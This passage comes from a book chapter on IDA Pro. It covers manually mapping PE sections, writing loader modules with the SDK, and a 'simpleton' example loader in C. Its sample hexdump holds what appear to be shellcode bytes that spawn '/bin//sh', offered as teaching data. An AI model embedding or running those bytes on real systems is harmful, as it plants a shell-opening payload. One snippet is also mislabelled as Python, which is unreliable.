the file and it adequately describes the section’s content. You may manually
enter the section’s start (inclusive) and end (exclusive) addresses, or they
will be filled in automatically if you have highlighted the range of addresses
that make up the section prior to opening the dialog. The section base value
is described in the SDK’s segment.hpp file. In a nutshell, for x86 binaries, IDA
computes the virtual address of a byte by shifting the segment base left four
bits and adding the offset to the byte (virtual = (base << 4) + offset). A
base value of zero should be used when segmentation is not used. The segment
class can be used to describe the content of the segment. Several predefined
class names such as CODE, DATA, and BSS are recognized. Predefined
segment classes are also described in segment.hpp.
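The base calculation quoted above can be restated as a one-line Python function. This is only a restatement of the formula for experimentation; the function name is ours and it is not an SDK call.

```python
def segment_virtual_address(base, offset):
    """Compute virtual = (base << 4) + offset for an x86 segment."""
    return (base << 4) + offset


if __name__ == "__main__":
    # With a base of zero (no segmentation), the offset is the address
    print("%Xh" % segment_virtual_address(0, 0x401000))
    # A nonzero base contributes base * 16 to the result
    print("%Xh" % segment_virtual_address(0x1000, 0x10))
```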

An unfortunate side effect of creating a new segment is that any data
that had been defined within the bounds of the segment (such as the headers
that we previously formatted) will be undefined. After reapplying all of
the header structures discussed previously, we return to the header for the
.text section to note that the VirtualAddress ➌ field (1000h) is an RVA that
specifies the memory address at which the section content should be loaded
and the SizeOfRawData ➍ field (600h) indicates how many bytes of data are
present in the file. In other words, this particular section header tells us
that the .text section is created by mapping the 600h bytes from file offsets
400h-9FFh to virtual addresses 401000h-4015FFh.
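The mapping from file offsets to virtual addresses for a single section can be sketched as follows. The function and parameter names are our own; the values in the usage example are the ones from the .text section header and the ImageBase discussed earlier.

```python
def file_offset_to_va(offset, image_base, virtual_address,
                      pointer_to_raw_data, size_of_raw_data):
    """Map a file offset inside a section's raw data to its virtual address."""
    end = pointer_to_raw_data + size_of_raw_data  # exclusive end offset
    if not pointer_to_raw_data <= offset < end:
        raise ValueError("offset lies outside this section's raw data")
    return image_base + virtual_address + (offset - pointer_to_raw_data)


if __name__ == "__main__":
    # First and last bytes of the .text section in our example
    for off in (0x400, 0x9FF):
        va = file_offset_to_va(off, 0x400000, 0x1000, 0x400, 0x600)
        print("%Xh -> %Xh" % (off, va))
```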

Because our example file was loaded in binary mode, all of the bytes of

the .text section are present in the database; we simply need to shift them

into their proper locations. Following creation of the .headers section, we

might have a display similar to the following at the end of the .headers section:

.headers:004003FF db 0

.headers:004003FF _headers ends

.headers:004003FF

seg001:00400400 ; ===========================================================

seg001:00400400

seg001:00400400 ; Segment type: Pure code

seg001:00400400 seg001 segment byte public 'CODE' use32

seg001:00400400 assume cs:seg001

seg001:00400400 ;org 400400h

seg001:00400400 assume es:_headers, ss:_headers, ds:_headers

seg001:00400400 db 55h ; U

When the .headers section was created, IDA split the original seg000 to

form the .headers section as we specified and a new seg001 to hold the remain-

ing bytes from seg000. The content for the .text section is resident in the data-

base as the first 600h bytes of seg001. We simply need to move the section to

the proper location and size the .text section correctly.

The first step in creating the .text section involves moving seg001 to virtual

address 401000h. Using the Edit▸Segments▸Move Current Segment

command, we specify a new start address for seg001, as shown in Figure 18-4.

Figure 18-4: Moving a segment

The next step is to carve the .text section from the first 600h bytes of the

newly moved seg001 using Edit▸Segments▸Create Segment. Figure 18-5

shows the parameters, derived from the section header values, used to create

the new section.

Keep in mind that the end address is exclusive. Creation of the .text

section splits seg001 into the new .text section and all remaining bytes of the

original file into a new section named seg002, which immediately follows the

.text section.

Figure 18-5: Manual creation of the .text section

Returning to the section headers, we now look at the second section,

which appears as follows once it has been structured as an IMAGE_SECTION_HEADER:

.headers:004001A0 db '.rdata',0,0 ; Name

.headers:004001A0 dd 60h ; VirtualSize

.headers:004001A0 dd 2000h ; VirtualAddress

.headers:004001A0 dd 200h ; SizeOfRawData

.headers:004001A0 dd 0A00h ; PointerToRawData

.headers:004001A0 dd 0 ; PointerToRelocations

.headers:004001A0 dd 0 ; PointerToLinenumbers

.headers:004001A0 dw 0 ; NumberOfRelocations

.headers:004001A0 dw 0 ; NumberOfLinenumbers

.headers:004001A0 dd 40000040h ; Characteristics

Using the same data fields we examined for the .text section, we note

that this section is named .rdata, occupies 200h bytes in the file beginning at

file offset 0A00h, and maps to RVA 2000h (virtual address 402000h). It is impor-

tant to note at this point that since we moved the .text segment, we can no

longer easily map the PointerToRawData field to an offset within the database.

Instead, we rely on the fact that the content for the .rdata section immedi-

ately follows the content for the .text section. In other words, the .rdata sec-

tion currently resides in the first 200h bytes of seg002. An alternative approach

would be to create the sections in reverse order, beginning with the last section

defined in the headers and working our way backwards until we finally create

the .text section. This approach leaves sections positioned at their proper

file offsets until they are moved to their corresponding virtual addresses.
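
The reverse-order approach can be expressed as a small planning routine. This is a sketch in plain Python, not an IDA script: the function name reverse_order_plan is hypothetical, only the two section headers shown so far are included, and the binary-mode load address of 400000h is taken from the earlier listing in which file offset 400h appears at address 00400400.

```python
def reverse_order_plan(sections, load_base, image_base):
    """Plan segment moves starting with the section stored last in the file.

    sections holds (name, rva, pointer_to_raw_data, size_of_raw_data) tuples.
    Each plan entry is (name, current_address, target_address, size).
    reverse_order_plan is a hypothetical helper, not an IDA API.
    """
    plan = []
    # Highest file offset first, so earlier sections have not moved yet.
    for name, rva, raw_ptr, raw_size in sorted(
            sections, key=lambda s: s[2], reverse=True):
        plan.append((name, load_base + raw_ptr, image_base + rva, raw_size))
    return plan


plan = reverse_order_plan(
    [(".text", 0x1000, 0x400, 0x600), (".rdata", 0x2000, 0xA00, 0x200)],
    load_base=0x400000,
    image_base=0x400000,
)
```

Because each section is handled before anything stored ahead of it in the file has moved, its current address can be computed directly from PointerToRawData.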

The creation of the .rdata section proceeds in a manner similar to the

creation of the .text section. In the first step, seg002 is moved to 402000h, and

in the second step, the actual .rdata section is created to span the address

range 402000h-402200h.

The next section defined in this particular binary is called the .bss sec-

tion. A .bss section is typically generated by compilers as a place to group all

statically allocated variables (such as globals) that need to be initialized to

zero when the program starts. Static variables with nonzero initial values are

typically allocated in a .data (nonconstant) or .rdata (constant) section. The

advantage of a .bss section is that it typically requires zero space in the disk

image, with space being allocated for the section when the memory image of

the executable is created by the operating system loader. In this example, the

.bss section is specified as follows:

.headers:004001C8 db '.bss',0,0,0,0 ; Name

.headers:004001C8 dd 40h ; VirtualSize

.headers:004001C8 dd 3000h ; VirtualAddress

.headers:004001C8 dd 0 ; SizeOfRawData

.headers:004001C8 dd 0 ; PointerToRawData

.headers:004001C8 dd 0 ; PointerToRelocations

.headers:004001C8 dd 0 ; PointerToLinenumbers

.headers:004001C8 dw 0 ; NumberOfRelocations

.headers:004001C8 dw 0 ; NumberOfLinenumbers

.headers:004001C8 dd 0C0000080h ; Characteristics

Here the section header indicates that the size of the section within the

file, SizeOfRawData, is zero, while the VirtualSize of the section is 0x40 (64)

bytes. In order to create this section in IDA, it is first necessary to create a gap

(because we have no file content to populate the section) in the address space

beginning at address 0x403000 and then define the .bss section to consume

this gap. The easiest way to create this gap is to move the remaining sections

of the binary into their proper places. When this task is complete, we might

end up with a Segments window listing similar to the following:

Name     Start    End      R W X D L Align Base Type   Class
.headers 00400000 00400400 ? ? ? . . byte  0000 public DATA   ...
.text    00401000 00401600 ? ? ? . . byte  0000 public CODE   ...
.rdata   00402000 00402200 ? ? ? . . byte  0000 public DATA   ...
.bss     00403000 00403040 ? ? ? . . byte  0000 public BSS    ...
.idata   00404000 00404200 ? ? ? . . byte  0000 public IMPORT ...
seg005   00404200 004058DE ? ? ? . L byte  0001 public CODE   ...

The right-hand portion of the listing has been truncated for the sake of

brevity. You may notice that the segment end addresses are not adjacent to

their subsequent segment start addresses. This is a result of creating the seg-

ments using their file sizes rather than taking into account their virtual sizes

and any required section alignment. In order to have our segments reflect

the true layout of the executable image, we could edit each end address to

consume any gaps between segments.
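
The end address needed to close each gap follows from the section's virtual size and the section alignment. The sketch below is plain Python with hypothetical helper names; the alignment of 1000h is an assumption inferred from the section RVAs (1000h, 2000h, 3000h, 4000h) and is not stated in the headers shown here.

```python
def align_up(value, alignment):
    """Round value up to the next multiple of alignment."""
    return (value + alignment - 1) // alignment * alignment


def aligned_end(start, virtual_size, alignment=0x1000):
    """Exclusive end address of a section once padded to the alignment.

    The default alignment of 1000h is an assumption for this example.
    """
    return start + align_up(virtual_size, alignment)


rdata_end = aligned_end(0x402000, 0x60)  # .rdata, VirtualSize 60h
bss_end = aligned_end(0x403000, 0x40)    # .bss, VirtualSize 40h
```

Under that assumption, each computed end address coincides with the start address of the following segment in the listing.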

The question marks in the segments list represent unknown values for

the permission bits on each section. For PE files, these values are specified

via bits in the Characteristics field of each section header. There is no way

to specify permissions for manually created sections other than by program-

matically using a script or a plug-in. The following IDC statement sets the

execute permission on the .text section in the previous listing:

SetSegmentAttr(0x401000, SEGATTR_PERM, 1);

Unfortunately, IDC does not define symbolic constants for each of the

allowable permissions. Unix users may find it easy to remember that the sec-

tion permission bits happen to correspond to the permission bits used in Unix

file systems; thus read is 4, write is 2, and execute is 1. You may combine the

values using a bitwise OR to set more than one permission in a single operation.
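
Since the permissions originate in the Characteristics field, the conversion can be sketched as follows. This is plain Python, not IDC; the function name and the PERM_* names are hypothetical, while the three IMAGE_SCN_MEM_* values are the memory-protection bits defined by the PE format.

```python
# Memory-protection bits in a PE section header's Characteristics field.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Permission values described above (hypothetical names for illustration).
PERM_EXEC, PERM_WRITE, PERM_READ = 1, 2, 4


def perm_from_characteristics(characteristics):
    """Translate PE Characteristics bits into a 4/2/1 permission value."""
    perm = 0
    if characteristics & IMAGE_SCN_MEM_READ:
        perm |= PERM_READ
    if characteristics & IMAGE_SCN_MEM_WRITE:
        perm |= PERM_WRITE
    if characteristics & IMAGE_SCN_MEM_EXECUTE:
        perm |= PERM_EXEC
    return perm


rdata_perm = perm_from_characteristics(0x40000040)  # .rdata header value
bss_perm = perm_from_characteristics(0xC0000080)    # .bss header value
```

The resulting value is what would be supplied as the third argument in a SetSegmentAttr call like the one shown above.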

The last step that we will cover in the manual loading process is to finally

get the x86 processor module to do some work for us. Once the binary has

been properly mapped into various IDA sections, we can return to the pro-

gram entry point that we found in the headers (RVA 1000h, or virtual address

401000h) and ask IDA to convert the bytes at that location to code. If we wish

to have IDA list the address as an entry point in the Exports window, we must

programmatically designate it as such. Here is a Python one-liner to do this:

AddEntryPoint(0x401000, 0x401000, 'start', 1);

Called in this manner, IDA will name the entry point 'start', add it as an

exported symbol, and create code at the specified address, initiating a recur-

sive descent to disassemble as much related code as possible. Please refer to

IDA’s built-in help for more information on the AddEntryPoint function.

When a file is loaded in binary mode, IDA performs no automatic analy-

sis of the file content. Among other things, no attempt is made to identify the

compiler used to create the binary, no attempt is made to determine what

libraries and functions the binary imports, and no type library or signature

information is automatically loaded into the database. In all likelihood, we

will need to do a substantial amount of work to produce a disassembly com-

parable to those we have seen IDA generate automatically. In fact, we have

not even touched on other aspects of the PE headers and how we might

incorporate such additional information into our manual loading process.

In rounding out our discussion of manual loading, consider that you

would need to repeat each of the steps covered in this section every time

you open a binary with the same format, one unknown to IDA. Along the

way, you might choose to automate some of your actions by writing IDC

scripts that perform some of the header parsing and segment creation for

you. This is exactly the motivation behind and the purpose for IDA loader

modules, which are covered in the next section.

IDA Loader Modules

IDA relies on loader modules to perform the grunt work of creating the

initial layout of new databases. Loaders are utilized when a user chooses to

open a new file, and the loader’s job is to read the input file into the newly

created database, create sections according to the structure of the input file,

and generally organize the layout of the database prior to passing control to

the processor module, whose job it is to perform any disassembly-related

tasks. Once a database has been created, IDA may invoke special functions

in the original loader in order to handle the movement of database segments

and in order to produce an EXE file (File▸Produce File▸Create EXE File).

The loading process begins when a user chooses to open a new file (load-

ers are not used to load existing databases). Like plug-ins, loaders may be built

as shared library components using the IDA SDK. Loaders were the first of

IDA’s extension modules capable of being implemented using scripts (intro-

duced in IDA 5.6).

Once a new binary has been selected, IDA loads, in a dynamic library

sense, each loader module in the <IDADIR>/loaders directory and asks each

module to examine the binary. All loaders that recognize the format of the

new file are listed in the file-loading dialog, and it is up to the user to decide

which loader should be used to load the file.

Writing an IDA Loader Using the SDK

IDA’s principal interface to any loader module takes place via a global loader_t

object that each loader must declare and export. The loader_t struct is analo-

gous to the plugin_t class used in plug-in modules. The following listing shows

the layout of the loader_t struct as defined in loader.hpp.

struct loader_t {
  ulong version;        // api version, should be IDP_INTERFACE_VERSION
  ulong flags;          // loader flags

  //check input file format. if recognized, fill in fileformatname
  //and return nonzero; otherwise return 0.
  int (idaapi *accept_file)(linput_t *li,
                            char fileformatname[MAX_FILE_FORMAT_NAME],
                            int n);

  //load file into the database.
  void (idaapi *load_file)(linput_t *li, ushort neflags,
                           const char *fileformatname);

  //create output file from the database, this function may be absent.
  int (idaapi *save_file)(FILE *fp, const char *fileformatname);

  //take care of a moved segment (fix up relocations, for example)
  //this function may be absent.
  int (idaapi *move_segm)(ea_t from, ea_t to, asize_t size,
                          const char *fileformatname);

  //initialize user configurable options based on the input file.
  //Called only when loading is done via File->New, not File->Open
  //this function may be absent.
  bool (idaapi *init_loader_options)(linput_t *li);
};

As with the plugin_t class, the behavior of a loader_t object is defined by

the functions (created by the loader’s author) to which its members point.

Every loader must export a loader_t object named LDSC (loader description).

Exporting your LDSC object is handled by loader.hpp, which leaves you respon-

sible only for declaring and initializing the actual object. Note that several of

the functions accept an input parameter of type linput_t (loader input type).

An linput_t is an internal SDK class that provides a compiler-independent

wrapper around the C standard FILE type. Functions implementing standard

input operations for linput_t are declared in diskio.hpp.

Since successful loader creation relies on properly initializing the LDSC

object, the purpose of each member is described here:

version

This member serves the same purpose as the version member of the

plugin_t class. Please refer to its description in Chapter 17.

flags

The only flag recognized for loaders is LDRF_RELOAD, defined in loader.hpp.

For many loaders assigning zero to this field will be sufficient.

accept_file

The purpose of this function is to provide basic recognition of a newly

selected input file. This function should utilize the provided linput_t

object to read enough information from a file to determine whether the

loader can parse the given file. If the file is recognized, the loader should

copy the file format name into the fileformatname output buffer. The

function should return 0 if the file format is not recognized or nonzero

if the format is recognized. ORing the return value with the ACCEPT_FIRST

flag requests that IDA list this loader first in the load-file dialog. When

several loaders indicate ACCEPT_FIRST, the last loader queried will be listed

first.

load_file

This member is another function pointer. IDA calls the associated func-

tion if the user chooses your loader to load the newly selected file. The

function receives an linput_t object that should be used to read the

selected file. The neflags parameter contains a bitwise OR of various

NEF_XXX flags defined in loader.hpp. Several of these flags reflect the state

of various checkbox settings from the load-file dialog. The load_file

function is responsible for any required parsing of the input file content

and loading and mapping some or all of the file content into the newly

created database. If an unrecoverable error condition is recognized,

load_file should call loader_failure to terminate the loading process.

save_file

This member optionally points to a function capable of producing an

executable file in response to the FileProduce FileCreate EXE File

command. Strictly speaking, the use of EXE here is a bit of a misnomer,

because your save_file implementation could choose to generate any

type of file that you wish. Since the loader is responsible for mapping a

file into a database, it may also have the capability to map the database

back into a file. In practice, the loader may not have loaded enough

information from the original input file to be able to generate a valid

output file based on database content alone. For example, the PE file

loader supplied with IDA cannot regenerate an EXE file from a database

file. If your loader is not capable of generating an output file, then you

should set the save_file member to NULL.

move_segm

This member is a pointer to a function that is called when a user attempts

to move a segment within a database that was loaded with this loader.

Since the loader may be aware of relocation information contained in

the original binary, this function may be able to take relocation informa-

tion into account as the segment is moved. This function is optional, and

the pointer should be set to NULL if the function is not required (for

example, when there are no relocated or fixed-up addresses in this file

format).

init_loader_options

This member is a pointer to a function whose purpose is to set user-

specified options via the wizard-based loading process available via

File▸New. This function is useful only in the Windows native GUI

version of IDA (idag) because this is the only version of IDA that offers

these wizards. This function is called once a user has chosen a loader,

prior to calling load_file. If the loader requires no configuration prior

to the call to load_file, this member pointer may be set safely to NULL.

The init_loader_options function deserves additional explanation. It is

important to understand that if FileOpen is used to open a file, this func-

tion will never be called. In more sophisticated loaders, such as IDA’s PE

loader, this function is used to initialize XML-based wizards that step the

user through the loading process. The XML templates for several wizards

are stored in <IDADIR>/cfg; however, other than the existing templates, no

documentation exists for creating your own wizard templates.

In the remainder of this chapter, we will develop two example loaders in

order to review some commonly used loader operations.

The Simpleton Loader

In order to demonstrate the basic operation of an IDA loader, we introduce

the completely fictitious simpleton file format as defined by the following C

struct (all values are little-endian):

struct simpleton {
  uint32_t magic;      //simpleton magic number: 0x1DAB00C
  uint32_t size;       //size of the code array
  uint32_t base;       //base virtual address and entry point
  uint8_t code[size];  //the actual program code
};

The file format is very straightforward: a magic number file identifier

and two integers describing the structure of the file, followed by all of the

code contained in the file. Execution of the file begins with the first byte in

the code block.

A hexdump of a small simpleton file might look like this:

0000000: 0cb0 da01 4900 0000 0040 0000 31c0 5050 ....I....@..1.PP

0000010: 89e7 6a10 5457 50b0 f350 cd91 5859 4151 ..j.TWP..P..XYAQ

0000020: 50cd 9166 817f 0213 8875 f16a 3e6a 025b P..f.....u.j>j.[

0000030: 5853 6a09 516a 3ecd 914b 79f4 5068 6e2f XSj.Qj>..Ky.Phn/

0000040: 7368 682f 2f62 6989 e350 5389 e150 5153 shh//bi..PS..PQS

0000050: b03b 50cd 91 .;P..
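
To confirm how the header fields line up with the hexdump, the same bytes can be decoded outside IDA. This is a minimal sketch in plain Python; the function name parse_simpleton is hypothetical, and the sample bytes are transcribed from the hexdump above.

```python
import struct

SIMPLETON_MAGIC = 0x1DAB00C

# Bytes transcribed from the hexdump above (85 bytes in total).
SAMPLE = bytes.fromhex(
    "0cb0 da01 4900 0000 0040 0000 31c0 5050 "
    "89e7 6a10 5457 50b0 f350 cd91 5859 4151 "
    "50cd 9166 817f 0213 8875 f16a 3e6a 025b "
    "5853 6a09 516a 3ecd 914b 79f4 5068 6e2f "
    "7368 682f 2f62 6989 e350 5389 e150 5153 "
    "b03b 50cd 91"
)


def parse_simpleton(data):
    """Decode the three little-endian header fields and slice out the code."""
    magic, size, base = struct.unpack_from("<III", data, 0)
    if magic != SIMPLETON_MAGIC:
        raise ValueError("not a simpleton file")
    code = data[12:12 + size]
    if len(code) != size:
        raise ValueError("truncated code array")
    return size, base, code


size, base, code = parse_simpleton(SAMPLE)
```

For this sample, the size field is 49h (73 bytes of code) and the base address is 4000h, which is also where execution would begin.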

Several sample loaders are included with the SDK and may be found in

the <SDKDIR>/ldr directory. We elect to build our loaders in individual sub-

directories alongside the example loaders. In this case we are working in

<SDKDIR>/ldr/simpleton. Our loader begins with the following setup:

#include "../idaldr.h"

#define SIMPLETON_MAGIC 0x1DAB00C

struct simpleton {
  uint32_t magic;  //simpleton magic number: 0x1DAB00C
  uint32_t size;   //size of the code array
  uint32_t base;   //base virtual address and entry point
};

The idaldr.h header file is a convenience file, included with the SDK

(<SDKDIR>/ldr/idaldr.h), which includes several other header files and

defines several macros, all of which are commonly used in loader modules.

The next order of business is to declare the required LDSC object, which

points to the various functions that implement our loader’s behavior:

int idaapi accept_simpleton_file(linput_t *, char[MAX_FILE_FORMAT_NAME], int);
void idaapi load_simpleton_file(linput_t *, ushort, const char *);
int idaapi save_simpleton_file(FILE *, const char *);

loader_t LDSC = {
  IDP_INTERFACE_VERSION,
  0,                      // loader flags
  accept_simpleton_file,  // test simpleton format.
  load_simpleton_file,    // load file into the database.
  save_simpleton_file,    // simpleton is an easy format to save
  NULL,                   // no special handling for moved segments
  NULL,                   // no special handling for File->New
};

The functions used in this loader are described in the order in which

they might be invoked, beginning with the accept_simpleton_file function

shown here:

int idaapi accept_simpleton_file(linput_t *li,
                                 char fileformatname[MAX_FILE_FORMAT_NAME],
                                 int n) {
  uint32 magic;
  if (n || lread4bytes(li, &magic, false)) return 0;
  if (magic != SIMPLETON_MAGIC) return 0; //bad magic number found
  qsnprintf(fileformatname, MAX_FILE_FORMAT_NAME, "Simpleton Executable");
  return 1; //simpleton format recognized
}

The entire purpose of this function is to determine whether the file

being opened appears to be a simpleton file. The n parameter is a counter

that indicates the number of times that our accept_file function has been

called during the current loading process. The intent of this parameter is to

allow a loader to recognize multiple related file formats. IDA will invoke your

accept_file function with increasing values of n until your function returns 0.

For each unique format that your loader recognizes, you should fill in the

fileformatname array and return nonzero. In this case, we elect to ignore any-

thing other than the first call (when n is zero) by immediately returning 0. The

lread4bytes function, defined in diskio.hpp, is used to read the 4-byte magic

number, and it returns 0 if the read completed successfully. A useful feature

of lread4bytes is its ability to read bytes in either big-endian or little-endian

format, depending on the value of its Boolean third parameter (false reads

little-endian; true reads big-endian). This feature can help reduce the num-

ber of calls to byte-swapping functions required during the loading process.

If the required magic number is located, the final step in accept_simpleton_file

is to copy the name of the file format into the fileformatname output parame-

ter prior to returning 1 to indicate that the file format was recognized.
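
The calling convention for the n parameter can be modeled outside IDA. The following is a plain Python sketch of the behavior described above, not SDK code: poll_loader and accept_simpleton are hypothetical names, and returning None stands in for the SDK function returning 0.

```python
SIMPLETON_MAGIC = 0x1DAB00C


def accept_simpleton(data, n):
    """Return a format name if recognized on call n, else None."""
    if n != 0 or len(data) < 4:
        return None  # only the first call (n == 0) is honored
    magic = int.from_bytes(data[:4], "little")  # little-endian read
    if magic != SIMPLETON_MAGIC:
        return None
    return "Simpleton Executable"


def poll_loader(accept, data):
    """Call accept with n = 0, 1, 2, ... until it declines."""
    names = []
    n = 0
    while True:
        name = accept(data, n)
        if name is None:
            break
        names.append(name)
        n += 1
    return names


recognized = poll_loader(accept_simpleton, bytes.fromhex("0cb0da01"))
rejected = poll_loader(accept_simpleton, bytes.fromhex("01dab00c"))
```

The second input holds the magic number in big-endian byte order, so a little-endian read does not match and the format is not reported. A loader that recognized several formats would return a different name for each successive value of n.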

For the simpleton loader, no special processing is required if a user

chooses to load a simpleton file using FileNew rather than FileOpen,

so no init_loader_options function is required. Therefore, the next function

called in the loading sequence will be load_simpleton_file, which is shown here:

void idaapi load_simpleton_file(linput_t *li, ushort neflags, const char *) {
  simpleton hdr;
  //read the program header from the input file
  lread(li, &hdr, sizeof(simpleton));
  //load file content into the database
  file2base(li, sizeof(simpleton), hdr.base, hdr.base + hdr.size,
            FILEREG_PATCHABLE);
  //create a segment around the file's code section
  if (!add_segm(0, hdr.base, hdr.base + hdr.size, NAME_CODE, CLASS_CODE)) {
    loader_failure();
  }
  //retrieve a handle to the new segment
  segment_t *s = getseg(hdr.base);
  //so that we can set 32 bit addressing mode on (x86 has 16 or 32 bit modes)
  set_segm_addressing(s, 1); //set 32 bit addressing
  //tell IDA to create the file header comment for us. Do this
  //only once. This comment contains license, MD5,
  // and original input file name information.
  create_filename_cmt();
  //Add an entry point so that the processor module knows at least one
  //address that contains code. This is the root of the recursive descent
  //disassembly process
  add_entry(hdr.base, hdr.base, "_start", true);
}

The bulk of the loading process takes place in a loader’s load_file func-

tion. Our simple loader performs the following tasks:

1. Read the simpleton header from the file using lread from diskio.hpp. The

lread function is very similar to the POSIX read function.

2. Load the code section from the file into the proper address space within

the database using file2base from loader.hpp.

3. Create a new database segment containing the newly loaded bytes using

add_segm from segment.hpp.

4. Specify 32-bit addressing on our new code segment by calling getseg and

set_segm_addressing from segment.hpp.

5. Generate a database header comment using create_filename_cmt from

loader.hpp.

6. Add a program entry point using add_entry, from entry.hpp, to provide the

processor module with a starting point for the disassembly process.

The file2base function is a workhorse function for loaders. Its prototype

appears here:

int ida_export file2base(linput_t *li, long pos, ea_t ea1, ea_t ea2, int patchable);

This function reads bytes from the provided linput_t beginning at the

file position specified by pos. The bytes are loaded into the database begin-

ning at address ea1, up to but not including ea2. The total number of bytes

read is calculated as ea2 − ea1. The patchable parameter indicates whether

IDA should maintain an internal mapping of file offsets to their correspond-

ing locations in the database. To maintain such a mapping, this parameter

should be set to FILEREG_PATCHABLE, which allows for the generation of IDA DIF

files, as discussed in Chapter 14.
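
The address-range semantics of file2base can be modeled in a few lines. This is a plain Python illustration of the behavior described above, not the SDK implementation: load_range is a hypothetical name, a dictionary stands in for the database, and the optional offset_map only approximates the idea of a patchable file-offset mapping.

```python
def load_range(file_bytes, pos, ea1, ea2, database, offset_map=None):
    """Copy ea2 - ea1 bytes starting at file offset pos into [ea1, ea2).

    Returns False if the file does not contain enough bytes.
    """
    count = ea2 - ea1  # ea2 is exclusive
    chunk = file_bytes[pos:pos + count]
    if len(chunk) != count:
        return False
    for i, value in enumerate(chunk):
        database[ea1 + i] = value
        if offset_map is not None:
            offset_map[ea1 + i] = pos + i  # remember where the byte came from
    return True


file_bytes = bytes(range(20))  # stand-in file: 12 header bytes, 8 code bytes
database, offset_map = {}, {}
loaded = load_range(file_bytes, 12, 0x4000, 0x4008, database, offset_map)
```

As with the real function, the number of bytes copied is determined entirely by the two addresses, so the caller never passes a length.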

The add_entry function is another important function in the loading pro-

cess. The disassembly process can begin only with addresses known to con-

tain instructions. For a recursive descent disassembler, such addresses are

generally obtained by parsing a file for entry points (such as exported func-

tions). The prototype for add_entry appears here:

bool ida_export add_entry(uval_t ord, ea_t ea, const char *name, bool makecode);

The ord parameter is useful for exported functions that may be exported

by ordinal number in addition to function name. If the entry point has no

associated ordinal number, ord should be set to the same value as the ea

parameter. The ea parameter specifies the effective address of the entry

point, while the name parameter specifies the name associated with the entry

point. The symbolic name _start is often applied to a program’s initial execu-

tion address. The boolean makecode parameter specifies whether the specified

address is to be treated as code (true) or not (false). Exported data items,

such as LDSC within a loader module, are examples of noncode entry points.

The final function that we have implemented in the simpleton loader,

save_simpleton_file, is used to create a simpleton file from the database con-

tents. Our implementation is shown here:

int idaapi save_simpleton_file(FILE *fp, const char *fileformatname) {
  uint32 magic = SIMPLETON_MAGIC;
  if (fp == NULL) return 1; //special case, success means we can save files
  segment_t *s = getnseg(0); //get segment zero, the one and only segment
  if (s) {
    uint32 sz = s->endEA - s->startEA; //compute the segment size
    qfwrite(fp, &magic, sizeof(uint32)); //write the magic value
    qfwrite(fp, &sz, sizeof(uint32)); //write the segment size
    qfwrite(fp, &s->startEA, sizeof(uint32)); //write the base address
    base2file(fp, sizeof(simpleton), s->startEA, s->endEA); //dump the segment
    return 1; //return success
  }
  else {
    return 0; //return failure
  }
}

A loader_t’s save_file function receives a FILE stream pointer, fp, to

which the function should write its output. The fileformatname parameter is

the same name filled in by the loader’s accept_file function. As mentioned

earlier, the save_file function is called in response to IDA’s File▸Produce

File▸Create EXE File command. In response to this command, IDA initially

calls save_file with fp set to NULL. When called in this manner, save_file is

being queried as to whether it can produce an output file of the type speci-

fied by fileformatname, in which case save_file should return 0 if it cannot cre-

ate the specified file type or 1 if it can create the specified file. For example,

the loader may be able to create a valid output file only if specific informa-

tion is present within the database.

When called with a valid (non-NULL) FILE pointer, save_file should

write a valid output file representation to the provided FILE stream. In such

cases, IDA creates the FILE stream after presenting the user with a File Save

dialog.
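
The two-phase protocol (a query call with a NULL stream, followed by a real call with an open stream) can be modeled as follows. This is a plain Python sketch rather than SDK code: save_simpleton is a hypothetical stand-in for a save_file implementation, None plays the role of the NULL FILE pointer, and an in-memory buffer replaces the stream that IDA would supply.

```python
import io
import struct

SIMPLETON_MAGIC = 0x1DAB00C


def save_simpleton(fp, base, code):
    """Return 1 on success or 0 on failure, mimicking save_file's result."""
    if fp is None:
        return 1  # query phase: report that this format can be written
    if not code:
        return 0  # nothing to write
    # Header: magic, size of the code array, base address (little-endian).
    fp.write(struct.pack("<III", SIMPLETON_MAGIC, len(code), base))
    fp.write(code)
    return 1


can_save = save_simpleton(None, 0x4000, b"\x31\xc0")  # query call
out = io.BytesIO()
result = save_simpleton(out, 0x4000, b"\x31\xc0")     # real call
image = out.getvalue()
```

A loader that can produce output only under certain conditions would perform those checks during the query call instead of returning 1 unconditionally.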

Returning to the save_simpleton_file function, the only truly interesting

function used in implementing our save_file capability is the base2file

function, which is the output counterpart to the file2base function used in

load_simpleton_file. The base2file function simply writes a range of database

values to a specified position within a supplied FILE stream.

IDA AND FILE POINTERS

If you develop modules for Windows versions of IDA, a very important aspect of

the behavior of an IDA FILE stream is noted in fpro.h and results from the fact that

IDA’s core DLL, ida_wll.dll, is built using Borland tools. In short, Borland FILE pointers

may not be shared between program modules, and any attempt to do so is likely to

result in an access violation, potentially crashing IDA. To work around this prob-

lem, IDA offers a complete set of wrapper functions in the form of qfxxx (such as

qfprintf declared in fpro.h) alternatives to the standard C-style FILE manipulation

routines (such as fprintf). A word of caution when using these functions, however,

is that the qfxxx functions do not always utilize the same parameters as their C-style

counterparts (qfwrite and fwrite, for example). If you wish to use the C-style FILE

manipulation functions, you must remember the following rules:

• You must define the USE_STANDARD_FILE_FUNCTIONS macro prior to including

fpro.h in your module.

• You must not mix IDA-provided FILE pointers with the C library FILE functions.

• You must not mix FILE pointers obtained from the C library functions with IDA’s

qfxxx functions.

While the simpleton file format borders on useless, it does serve one

purpose, namely that it has allowed us to demonstrate the core functionality

of IDA loader modules. The source code for the simpleton loader may be

found on the book’s website.

Building an IDA Loader Module

The process for building and installing an IDA loader module is virtually

identical to the process for building an IDA plug-in module as discussed in

Chapter 17, with only a few minor differences. First, the file extensions used

for loaders are .ldw/.l64 on Windows, .llx/.llx64 on Linux platforms, and

.lmc/.lmc64 on OS X. Second, this is a matter of personal preference, but

when we build loaders, we store the newly created loader binaries into

<SDKDIR>/bin/loaders. Third, loader modules are installed by copying the

compiled loader binary to <IDADIR>/loaders. The plug-in makefile presented

in Listing 17-1 is easily adapted to build the simpleton loader by changing the

PLUGIN_EXT variable to a LOADER_EXT variable that reflects the proper loader file

extensions for each IDA platform, changing all references to idabook_plugin to

simpleton, and changing the OUTDIR variable to point to $(IDA)/bin/loaders.

A pcap Loader for IDA

Granted, the majority of network packets do not contain code that can be

disassembled. However, if the packets happen to contain evidence of an

exploit, the packets may contain binary code that might require disassembly

for proper analysis. In order to demonstrate that IDA loaders can be used for

many purposes, we now describe the construction of a loader capable of

loading a pcap-format packet-capture file (see http://www.tcpdump.org/) into an

IDA database. While this may be somewhat over the top, along the way we will

